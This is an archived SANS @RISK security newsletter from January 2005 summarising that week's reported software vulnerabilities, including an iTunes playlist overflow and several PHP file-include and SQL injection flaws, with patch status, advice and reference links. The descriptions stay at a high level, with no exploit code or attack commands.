Last day to save $500 for SANS San Diego 2013

@RISK: The Consensus Security Vulnerability Alert

Volume: IV, Issue: 2
January 13, 2005

SANS Newsletters Home

Your Defense In Depth and Roadmap to Network Security poster should have arrived (if you live in the US or Canada). If you didn't get one, you can still see which security tools actually work and what constitutes a complete defense in depth at http://www.sans.org/whatworks.

@RISK is the SANS community's consensus bulletin summarizing the most important vulnerabilities and exploits identified during the past week and providing guidance on appropriate actions to protect your systems (PART I). It also includes a comprehensive list of all new vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:

    • Category
    • # of Updates & Vulnerabilities
    • Windows
    • 3 (#1, #2, #5, #12)
    • Third Party Windows Apps
    • 6 (#6, #11)
    • Unix
    • 6 (#7, #9)
    • Novell
    • 2
    • Cross Platform
    • 3 (#3, #4)
    • Web Application
    • 13 (#8, #10)
    • Network Device
    • 2
    • Hardware
    • 1
Table Of Contents
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)
Windows
Third Party Windows Apps
Unix
Novell
Cross Platform
Web Application
Network Device
Hardware

**************** Sponsored by SANS Orlando 2005 *************************

The largest security training conference in Orlando starts in just 30 days. Practical, timely, exciting training programs for every security professional. Fourteen immersion tracks for security practitioners, managers and auditors. Those seeking ISC2 CISSP certification will find the nation's top rated prep course at SANS Orlando, too. Plus seven one and two day short courses. And Orlando is comfortable in February! Details: http://www.sans.org/orlando05/ PS. The late registration deadline is Friday, January 14.

*************************************************************************

PART I Critical Vulnerabilities

Part I is compiled by the security team at TippingPoint (www.tippingpoint.com) as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Widely Deployed Software
  • (3) HIGH: Apple iTunes Playlist Handling Overflow
  • Affected:
    • iTunes versions prior to 4.7.1

  • Description: Apple's iTunes is a popularly used media player on both Windows and Mac OS systems. The player contains a buffer overflow in handling playlist files i.e. files with a ".m3u" or ".pls" extension. Specifically, an overlong URL (over 3045 bytes) in a malicious playlist file triggers the buffer overflow. A malicious webpage can exploit the flaw to execute arbitrary code on a client system. Note that if iTunes is the default player no user interaction is required to leverage the flaw.

  • Status: Apple confirmed, upgrade to version 4.7.1.

  • Council Site Actions: We were unable to solicit the council site input for this item.

  • References:
  • (4) MODERATE: Multiple Vendor LDAP Directory Server Buffer Overflow
  • Affected:
    • Netscape Directory Server version 6.21 and prior
    • Hitachi Directory Server version 2 P-2444-A124 02-11-/H and prior
    • Possibly other Directory servers

  • Description: Multiple vendor implementation of LDAP protocol contains a buffer overflow. An unauthenticated attacker can exploit the flaw to possibly execute arbitrary code on the vulnerable Directory servers with the privileges of the LDAP service. No technical details regarding the nature of the LDAP query, which can trigger the overflow, have been posted yet.

  • Status: HP and RedHat have confirmed the flaw and released updates. A confirmation is awaited from many other vendors.

  • Council Site Actions: We were unable to solicit the council site input for this item.

  • References:
  • (5) MODERATE: Microsoft Indexing Service Buffer Overflow
  • Affected:
    • Windows XP/2003 running Indexing Service

  • Description: Windows Indexing Service is a base service for Windows 2000 or later that extracts content from files, and constructs an indexed catalog to facilitate efficient and rapid searching. The Indexing service is accessible to anonymous users via HTTP only if the IIS server is specially configured (not a default configuration). Under such a configuration, an anonymous user may trigger a buffer overflow in the Indexing service via a crafted query. The flaw may be exploited to execute arbitrary code with "SYSTEM" privileges. Limited technical details about the flaw are publicly available. Note that the Indexing service can be accessed via SMB. However, the service is accessible over SMB only to authenticated users there by reducing the risk of attacks via this attack vector.

  • Status: Apply the patch contained in the Microsoft Security Bulletin MS05-003.

  • Council Site Actions: Most of the reporting council sites do not run indexing or if they do it is on a very limited basis. Those who are using indexing plan to install the patch during their next regularly scheduled update process.

  • References:
  • (6) MODERATE: Symantec Norton Antivirus Software DoS
  • Affected:
    • Symantec Norton Antivirus 2004 and prior

  • Description: Symantec Norton antivirus is a very widely used product for protecting Windows systems. The product reportedly contains a denial-of-service vulnerability. The flaw exists in the product's "ccErrDsp.dll". This DLL registers a COM object which contains an overflow that can be triggered by a large parameter. A malicious website may exploit this flaw to kill the antivirus process on a client, and then install malware by exploiting any of the unpatched IE vulnerabilities. A proof-of-concept exploit is included in the discoverer's posting.

  • Status: Symantec is validating the flaw and will release patches, if necessary.

  • Council Site Actions: Only a few council sites are using the affected software. They are waiting on confirmation and a patch from the vendor.

  • References:
Other Software
  • (7) HIGH: poppassd_pam Unauthorized Password Change
  • Affected:
    • poppassd_pam version 1.0 and prior
    • poppassd_ceti version 1.0 and prior

  • Description: poppassd_pam server allows users to change their system passwords thereby allowing the users to change their POP passwords. The server contains a flaw that allows any user to change another user's password, including root user's password. Hence, the flaw can be exploited to possibly obtain root access on the server running poppassd_pam. The problem arises because the server does not validate any user's current password prior to changing it.

  • Status: Vendor confirmed, fixes available.

  • Council Site Actions: We were unable to solicit the council site input for this item.

  • References:
  • (8) HIGH: SugarCRM and VHCS Remote File Include Vulnerabilities
  • Affected:
    • Sugar CRM, possibly all versions
    • Virtual Hosting Control System (VHCS) version 2.2 and prior

  • Description: The following software packages reportedly contain PHP remote file include vulnerabilities: SugarCRM and VHCS. These flaws can be exploited by a remote attacker to run arbitrary PHP code on the webserver hosting the vulnerable software packages. The postings show how to craft the malicious HTTP requests to exploit the flaws. Note that the vulnerabilities can be exploited only if the server's "register_globals" PHP configuration parameter is turned "On". The default setting for this parameter is "Off" for PHP versions 4.2.0 or higher. Status: SugarCRM - Fix information included in the discoverer's posting. VHCS - Unknown. A workaround is to turn the "register_globals" off.

  • Council Site Actions: The affected software is not in production or widespread use, or is not officially supported at any of the council sites. They reported that no action was necessary.

  • References:
Exploit Code
Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 2, 2005

This list is compiled by Qualys ( www.qualys.com ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 4008 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.

  • 05.2.1 - CVE: CAN-2004-1043
  • Platform: Windows
  • Title: Windows HTML Help Code Execution
  • Description: A cross-domain vulnerability exists in Windows HTML Help ActiveX control that could allow information disclosure or remote code execution on an affected system. An attacker could exploit this vulnerability by constructing a malicious web page that could allow remote code execution if an unsuspecting user visits that page. All windows systems are affected.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS05-001.mspx
  • 05.2.2 - CVE: CAN-2004-1049
  • Platform: Windows
  • Title: Windows User32.DLL Buffer Overflow
  • Description: Windows ANI (Animated Cursor Files) handler component in user32.dll is affected by a stack based buffer overflow issue. The issue exists because the user-specified length of an ANI file header is directly used in the "memcpy()" operation without boundary checks. All versions of Microsoft Windows are vulnerable to this issue.
  • Ref: http://www.microsoft.com/technet/security/bulletin/MS05-002.mspx
  • 05.2.3 - CVE: CAN-2004-0897
  • Platform: Windows
  • Title: Windows Indexing Service Buffer Overflow
  • Description: Microsoft Indexing Service is used to manage, query, and index information in file systems or Web servers. Microsoft Indexing Service is affected by a buffer overflow vulnerability. Microsoft has released a security advisory to solve this issue.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS05-003.mspx
  • 05.2.4 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Amp II 3D Game Engine Remote Denial of Service
  • Description: The Amp II 3D game engine is reported to be vulnerable to a remote denial of service condition since it fails to handle certain malformed network requests. Remote attackers could leverage this to deny service to legitimate clients of the game server. Amp Gore Ultimate Soldier version 1.50 is reported to be vulnerable.
  • Ref: http://aluigi.altervista.org/adv/amp2zero-adv.txt
  • 05.2.5 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Jeuce Web Server Directory Traversal and Denial of Service
  • Description: Jeuce Web Server is affected by directory traversal and denial of service issues. The cause of these issues is due to insufficient sanitization of "../" directory traversal and "://" sequences. Jeuce Web Server version 2.13 is affected.
  • Ref: http://www.securityfocus.com/bid/12183/info/
  • 05.2.6 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: WinHKI Multiple Remote Vulnerabilities
  • Description: WinHKI is a file compression tool for Microsoft Windows. WinHKI fails to correctly handle file length, which could cause the consumption of all CPU resources. It also allows for overwriting and decompression of existing files in an arbitrary location. WinHKI version 1.4d is known to be vulnerable.
  • Ref: http://www.securityfocus.com/bid/12176/info/
  • 05.2.7 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Winace Remote Directory Traversal
  • Description: Winace is a file compression/decompression tool. Winace is affected by a vulnerability that may allow an attacker to place files and overwrite files in arbitrary locations on a vulnerable computer. Winace versions 2.5 and 2.6 Beta 4 are reported to be vulnerable.
  • Ref: http://www.securityfocus.com/bid/12177/info/
  • 05.2.8 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: 3CDaemon Multiple Remote Vulnerabilities
  • Description: 3Com 3CDaemon is a TFTP, FTP, and Syslog daemon from 3Com. It is reportedly vulnerable to multiple security issues. These include format string, buffer overflow, information disclosure and denial of service conditions due to specially-crafted network requests. 3CDaemon 2.0 revision 10 is reported to be vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/385969
  • 05.2.9 - CVE: CAN-2004-1312
  • Platform: Third Party Windows Apps
  • Title: GFI MailEssentials and MailSecurity Remote Denial of Service
  • Description: GFI MailEssentials and MailSecurity are vulnerable to a remote denial of service condition. This is exposed while handling certain HTML email messages containing malformed JavaScripts. This can be leveraged to deny service to legitimate users of the service. GFI MailSecurity versions 8.x and MailEssentials versions 9.x and 10.x are reported to be vulnerable.
  • Ref: http://www.csis.dk/default.asp?m=1&a=194
  • 05.2.10 - CVE: CAN-2004-1143, CAN-2004-1177
  • Platform: Unix
  • Title: Mailman Multiple Vulnerabilities
  • Description: GNU Mailman is an email discussion lists manager. Mailman is vulnerable to a cross-site scripting issue due to insufficient sanitization of user-supplied data. Mailman is also affected by a password generation weakness. Mailman versions 2.x are known to be vulnerable.
  • Ref: http://secunia.com/advisories/13603/
  • 05.2.11 - CVE: Not Available
  • Platform: Unix
  • Title: Squid Proxy Malformed NTLM Message Remote Denial of Service
  • Description: Squid is a web proxy software. Squid is vulnerable to a denial of service issue due to the way it handles specially crafted NTLM type 3 message. It could also crash the NTLM helper application. Squid version 2.5 is known to be vulnerable.
  • Ref: http://www.squid-cache.org/Versions/v2/2.5/bugs/#squid-2.5.STABLE7-fakeauth_auth
  • 05.2.12 - CVE: Not Available
  • Platform: Unix
  • Title: CUPS HTTP GET Denial Of Service
  • Description: CUPS, Common UNIX Printing System, is a set of printing utilities for UNIX-based systems. CUPS is affected by a denial of service vulnerability. CUPS versions 1.1.22 and earlier are known to be affected.
  • Ref: http://www.cups.org/str.php?L1042+P0+S-1+C0+I0+E0+Q1042
  • 05.2.13 - CVE: CAN-2005-0012
  • Platform: Unix
  • Title: Dillo Interface Message Format String Vulnerability
  • Description: Dillo Web browser is vulnerable to a format string vulnerability. This is exposed when it handles certain malicious web pages. Such web pages could leverage this issue to execute arbitrary code in the context of the browsers of unsuspecting clients. All current versions are vulnerable.
  • Ref: http://www.securityfocus.com/advisories/7788
  • 05.2.15 - CVE: Not Available
  • Platform: Unix
  • Title: LPRng Local Insecure Temporary File Creation Vulnerability
  • Description: The LPRng software is an extended and portable implementation of the Berkeley LPR print spooler. It is vulnerable to a temporary file creation issue in the "lprng_certs.sh" script. An attacker may leverage this issue to corrupt arbitrary files with the privileges of an unsuspecting user that activates the affected application. LPRng version 3.8.28 is vulnerable to this issue.
  • Ref: http://www.securityfocus.com/bid/12088/info/
  • 05.2.16 - CVE: Not Available
  • Platform: Novell
  • Title: Novell Netware CIFS.NLM Remote Denial of Service
  • Description: CIFS.NLM is the Novell implementation of the Samba file sharing software. It is affected by a remote denial of service issue when a port scan is run against the server. Netware versions 5.1 and 6.0 are affected.
  • Ref: http://support.novell.com/cgi-bin/search/searchtid.cgi?/2970488.htm
  • 05.2.17 - CVE: Not Available
  • Platform: Novell
  • Title: Novell GroupWise WebAccess Information Disclosure
  • Description: GroupWise is the groupware package distributed and maintained by Novell. Its WebAccess component is vulnerable to a potential information disclosure vulnerability which may allow remote attackers to gather sensitive data that may be used to mount further attacks against a vulnerable computer. All versions of GroupWise are considered to be vulnerable.
  • Ref: http://www.securityfocus.com/bid/12194
  • 05.2.18 - CVE: CAN-2005-0043
  • Platform: Cross Platform
  • Title: Apple iTunes Playlist Buffer Overflow
  • Description: Apple iTunes is vulnerable to a buffer overflow condition while parsing specially crafted playlist files. If remote attackers can trick users into opening such files, this could be leveraged to execute arbitrary malicious code on the vulnerable system. iTunes versions earlier than 4.7.1 are reported to be vulnerable.
  • Ref: http://secunia.com/advisories/13804/
  • 05.2.19 - CVE: CAN-2004-0991
  • Platform: Cross Platform
  • Title: mpg123 Layer 2 Frame Header Heap Overflow
  • Description: mpg123 is a media player. It is reported to be vulnerable to a heap overflow issue due to improper sanitization of MP2 and MP3 files headers. mpg123 versions earlier than 0.59s-r9 are reported to be vulnerable.
  • Ref: http://secunia.com/advisories/13779/
  • 05.2.20 - CVE: CAN-2004-1183
  • Platform: Cross Platform
  • Title: LibTIFF Heap Corruption Integer Overflow Vulnerability
  • Description: LibTIFF is a library for manipulating Tag Image File Format (TIFF) files. It is vulnerable to a heap corruption issue that gets triggered when malicious or malformed image files are processed, and may be exploited by an attacker to execute arbitrary code in the user's system. LibTiff versions 3.7.1 and earlier are vulnerable.
  • Ref: http://www.securityfocus.com/advisories/7757
  • 05.2.21 - CVE: Not Available
  • Platform: Web Application
  • Title: VideoDB Unauthorized Access Vulnerability
  • Description: VideoDB is a database front-end application written in PHP to manage personal video collection. It is vulnerable to an unauthorized access issue due to the application failing to properly verify user permissions in the "edit.php" file. This may be exploited by a malicious user to edit or delete arbitrary movie database entries. VideoDB version 2.0.0 is vulnerable.
  • Ref: http://sourceforge.net/project/shownotes.php?release_id=295443
  • 05.2.22 - CVE: Not Available
  • Platform: Web Application
  • Title: PHPWind Board Remote File Include
  • Description: PHPWind Board is a web-based bulletin board application. PHPWind Board is affected by a remote file include vulnerability. PHPWind Board versions 1.3.6 and earlier are known to be affected.
  • Ref: http://www.securiteam.com/unixfocus/5FP012KEKS.html
  • 05.2.23 - CVE: Not Available
  • Platform: Web Application
  • Title: Zeroboard DIR Parameter Remote File Include
  • Description: Zeroboard is a web-based bulletin board application. Zeroboard is vulnerable to a remote file include issue due to insufficient sanitization of the "dir" parameter in the "error.php" script. All versions of Zeroboard are vulnerable.
  • Ref: http://www.optik4lab.com/modules/news/article.php?storyid=13
  • 05.2.24 - CVE: Not Available
  • Platform: Web Application
  • Title: Invision Community Blog SQL Injection
  • Description: Invision Community Blog is a web-based application. It is reported to be vulnerable to a SQL injection issue due to improper sanitization of the "eid" parameter in the "index.php" script. All versions of Invision Community Blog are reported to be vulnerable.
  • Ref: http://archives.neohapsis.com/archives/bugtraq/2005-01/0078.html
  • 05.2.25 - CVE: Not Available
  • Platform: Web Application
  • Title: Simple PHP Blog Remote Directory Traversal Vulnerabilities
  • Description: Simple PHP Blog is a web application implemented in PHP. It is reported to be vulnerable to two remote directory traversal issues due to improper sanitization of the "entry" parameter of the "comments.php" and the "comment_add_cgi.php" scripts. PHP Blog version 0.3.7c is reported to be vulnerable.
  • Ref: http://archives.neohapsis.com/archives/bugtraq/2005-01/0066.html
  • 05.2.26 - CVE: Not Available
  • Platform: Web Application
  • Title: WoltLab Burning Board Lite Form Mail Script Cross-Site Scripting
  • Description: WoltLab Burning Board Lite is a Web-based bulletin board system. It is reported to be vulnerable to a cross-site scripting issue, due to improper sanitization of the "userid" parameter in the "formmail.php" script. WoltLab Burning Board Lite versions 1.0.0 and 1.0.1e are vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/386590
  • 05.2.27 - CVE: Not Available
  • Platform: Web Application
  • Title: SugarCRM Remote File Include
  • Description: SugarCRM is a customer relationship management suite. Insufficient sanitization of the "moduleDefaultFile" variable in the "index.php" script exposes a remote file include issue. SugarSales versions 1.0g through 2.0.1c are affected.
  • Ref: http://www.securityfocus.com/bid/12183/info/
  • 05.2.28 - CVE: Not Available
  • Platform: Web Application
  • Title: Greymatter Password Disclosure Vulnerability
  • Description: Greymatter is a web-based log and journal maintenance system. It is vulnerable to a password disclosure issue because it creates a temporary file that includes the username and plaintext password. An attacker can exploit this issue to retrieve the temporory file with a GET request. Only Greymatter version 3.1 is vulnerable to this issue.
  • Ref: http://www.kernelpanik.org/docs/kernelpanik/greym13.en.txt
  • 05.2.29 - CVE: Not Available
  • Platform: Web Application
  • Title: Amphora Gate Unauthorized Access Vulnerability
  • Description: Amphora Gate is a device that manages Internet access for Hotels, cyber cafes, etc. It is reported to be vulnerable to an unauthorized access issue. The issue exists due to sensitive information disclosure using the "free_loginpage.php" and the "validaction.php" scripts.
  • Ref: http://www.securityfocus.com/bid/12187/info/
  • 05.2.30 - CVE: Not Available
  • Platform: Web Application
  • Title: Greymatter Multiple HTML Injection Vulnerabilities
  • Description: Noah Grey Greymatter is a web-based log and journal maintenance system. It is reported to be vulnerable to HTML injection issues in the "gm-comments.cgi" and the "gm-cplog.cgi" scripts due to the application failing to sanitize user-supplied input. Noah Grey Greymatter version 1.3 is vulnerable.
  • Ref: http://www.kernelpanik.org/docs/kernelpanik/greym13.en.txt
  • 05.2.31 - CVE: Not Available
  • Platform: Web Application
  • Title: b2evolution SQL Injection Vulnerability
  • Description: b2evolution is a weblog and newsfeed application manager. It is vulnerable to an SQL injection due to insufficient sanitization of the "title" parameter of the "index.php" script. All versions of b2evolution are known to be vulnerable.
  • Ref: http://forums.b2evolution.net/viewtopic.php?p=12962
  • 05.2.32 - CVE: Not Available
  • Platform: Web Application
  • Title: Virtual Hosting Control System Remote File Include
  • Description: Virtual Hosting Control System is a web-based control panel for Web server management. Its "sql.php" script is vulnerable to a remote PHP file include issue that allows attackers to execute arbitrary scripts on the web server. Virtual Hosting Control System version 2.2 is reported to be vulnerable.
  • Ref: http://www.kernelpanik.org/docs/kernelpanik/vhcs22.en.txt
  • 05.2.33 - CVE: Not Available
  • Platform: Web Application
  • Title: HTML Headline Temporary File Symbolic Link Vulnerabilities
  • Description: HTML Headline is a script for automatically retrieving headlines from various websites. It is reported to be vulnerable to an insecure temporary file issue. An attacker could leverage this using symbolic links to overwrite arbitrary files. Toshiaki Kanosue HTML Headline version 21.8 is reported to be vulnerable.
  • Ref: http://www.securityfocus.com/bid/12147/info/
  • 05.2.34 - CVE: Not Available
  • Platform: Network Device
  • Title: Multiple Vendor Bluetooth Unauthorized Command Access Vulnerabilities
  • Description: Bluetooth is a wireless communication protocol. It is reported that remote attackers may be able to access the device without authorization. This vulnerability is in the application rather than the blutooth protocol layer. Currently, Ericsson Ericsson T610, Motorola V600, Motorola V80, Nokia Nokia 6310i are reported to be vulnerable.
  • Ref: http://www.thebunker.net/security/bluetooth.htm
  • 05.2.35 - CVE: Not Available
  • Platform: Network Device
  • Title: AirPort Wireless Distribution System Remote Denial of Service
  • Description: Apple AirPort Express and AirPort Extreme base stations are wireless access points. In the Wireless Distribution System mode, AirPort Express and AirPort Extreme base stations are vulnerable to denial of service if there is a connection made to a base station on UDP port 161 and a link state change occurs. Apple AirPort Express Firmware version 6.1 and Apple AirPort Extreme Firmware version 5.5 are vulnerable.
  • Ref: http://www.securityfocus.com/bid/12152/info/
  • 05.2.36 - CVE: Not Available
  • Platform: Hardware
  • Title: Teledat 530 DSL Router Denial of Service
  • Description: Deutsche Telekom Teledat 530 DSL Router fails to handle unspecified character data on port 515. This causes the application to crash. Teledat 530 DSL router is reported vulnerable.
  • Ref: http://secunia.com/advisories/9299/

(c) 2005. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

==end==

Subscriptions: @RISK is distributed free of charge to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.

To subscribe, at no cost, go to https://portal.sans.org where you may also request subscriptions to any of SANS other free newsletters.

To change your subscription, address, or other information, visit http://portal.sans.org

Copyright 2005. All rights reserved. No posting or reuse allowed, other that listed above, without prior written permission.

SANS training is like a catalyst. It not only boosts your knowledge but also inspires you to learn more.
-Tan Koon Yaw, IDA

CyberTalent Assessments

Latest Whitepapers

Building and Maintaining a "Certifiable" Workforce
By Robert J. Mavretich

How Can You Build and Leverage SNORT IDS Metrics to Reduce Risk?
By Tim Proffitt

Daisy Chain Authentication
By Courtney Imbert

Latest Tweets

NEW #SANS Survey: Security Analytics & Intelligence 2nd [...]
October 1, 2013 - 6:30 PM

Tips on how to convince your boss to let you train online wi [...]
October 1, 2013 - 6:23 PM

#2 Tip on how 2 convince your boss 2 let u train online: Fle [...]
October 1, 2013 - 3:00 PM

Contact Us

(301) 654-SANS (7267)
Mon-Fri 9am - 8pm EST/EDT
info@sans.org

"It has really been an eye opener concerning the depth of security training & awareness that SANS has to offer."
- Michael Hall, Drivesavers

"SANS is a great place to enhance your technical and hands-on skills and tools. I thoroughly recommend it."
- Aaron Waugh, Datacom NZ Ltd

"Expertise of the trainer is impressive, real life situations explained, very good manuals. Best training ever!"
- Jerry Robles de Medina, Godo CU